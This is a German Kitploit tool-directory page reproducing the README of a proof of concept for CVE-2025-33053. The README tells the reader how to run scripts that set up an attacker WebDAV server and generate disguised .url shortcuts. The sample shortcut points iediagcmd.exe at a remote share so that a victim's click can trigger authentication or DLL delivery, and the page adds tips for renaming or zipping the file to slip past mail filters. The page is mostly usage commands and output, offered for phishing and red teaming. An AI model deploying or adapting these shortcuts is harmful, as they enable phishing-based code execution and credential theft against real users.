Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-33053-Proof-Of-Concept — CVE-2025-33053 Proof Of Concept (PoC) | Kitploit
Tools/GitHubGitHub/devbuihieu/cve-2025-33053-proof-of-concept
Payload-GenerierungExploitationLaterale BewegungPhishingWebsicherheitPenetrationstestsCommand and ControlSocial EngineeringRed Teaming
GitHubdevbuihieu/cve-2025-33053-proof-of-concept

CVE-2025-33053-Proof-Of-Concept

CVE-2025-33053 Proof Of Concept (PoC)

Repository anzeigen
64164vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-33053 Proof Of Concept

Dieses Repository stellt Skripte bereit, um automatisch einen WebDAV-Server auf Ubuntu mit Apache2 bereitzustellen und bösartige .url-Verknüpfungsdateien für Phishing, Red Teaming oder Simulation von Lateral Movement zu generieren.


📁 Inhalt

  • setup_webdav.sh – Bash-Skript zur Konfiguration von Apache2 + WebDAV.
  • setup_webdav.py – Python-Version des obigen.
  • gen_url.py – Python-Skript zum Generieren von .url-Verknüpfungsdateien mit UNC/WebDAV-Pfaden.
  • README.md – Dokumentation.

🔧 Voraussetzungen

  • Betriebssystem: Ubuntu 20.04 oder neuer (Debian-kompatibel)
  • Root-Rechte (sudo)
  • Python 3.x

  • 🚀 Setup-Anleitung

    1. WebDAV-Server (via Bash)

    root@kitploit:~
    sudo bash setup_webdav.sh
    

    Oder mit Python:

    root@kitploit:~
    sudo python3 setup_webdav.py
    

    Standardmäßig führt das Skript Folgendes aus:

    • Apache und erforderliche WebDAV-Module installieren.
    • Ein gemeinsames Verzeichnis unter /var/www/webdav erstellen.
    • Die Module DAV und DAV_FS aktivieren.
    • Ein DavLockDB-Verzeichnis erstellen (um Apache-DAV-Sperrfehler zu vermeiden).
    • Den Apache-Dienst neu starten.

    📎 WebDAV-Pfad: http://<your-ip>/webdav/


    💣 Generieren einer bösartigen .url-Verknüpfung

    Beispielverwendung:

    root@kitploit:~
    python3 gen_url.py --ip 192.168.1.100 --out doc.url
    

    Alle Optionen:

    root@kitploit:~
    python3 gen_url.py \
      --ip 《YOUR IP ADDRESS》\
      --share 《YOUR SHARE NAME》(Default: webdav) \
      --out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
      --exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
      --icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
      --index 13 \
      --modified 20F06BA06D07BD014D
    

    Dies erzeugt eine .url-Datei wie folgt:

    root@kitploit:~
    [InternetShortcut]
    URL=C:\Program Files\Internet Explorer\iediagcmd.exe
    WorkingDirectory=\\192.168.1.100\webdav\
    ShowCommand=7
    IconIndex=13
    IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Modified=20F06BA06D07BD014D
    

    📌 Ein Klick auf diese Datei (in bestimmten Konfigurationen) kann dazu führen, dass das Zielsystem automatisch eine Verbindung zu Ihrem WebDAV-Server herstellt (Authentifizierung oder DLL-Lieferung).


    🔒 Hinweise für Sicherheitstests

    • Firewall deaktivieren (oder Port 80 öffnen) , wenn Sie in einem lokalen Netzwerk testen:
      root@kitploit:~
      sudo ufw allow 80
      
    • .url-Dateien werden je nach Konfiguration möglicherweise nicht wie erwartet ausgeführt:
      • Gruppenrichtlinieneinschränkungen
      • Standardanwendungen
      • E-Mail-Client (Gmail könnte sie bereinigen)
    • Möglicherweise müssen Sie .url zippen oder in .txt umbenennen, um Filter zu umgehen.

    ⚠️ Rechtlicher Hinweis

    Dieses Repository ist nur für Bildungszwecke und autorisierte Penetrationstests bestimmt.
    Verwenden Sie diese Skripte nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben.


    🧠 Referenzen

    • WebDAV-Server-Setup - LinuxConfig.org
    • WebDAV Apache-Konfiguration - Peter Girnus
    • Microsoft WebDAV-Dokumentation

    📬 Kontakt

    Bei Fragen oder Anfragen zu ethischen Red-Teaming-Aktivitäten wenden Sie sich bitte über GitHub Issues.

    Tool herunterladen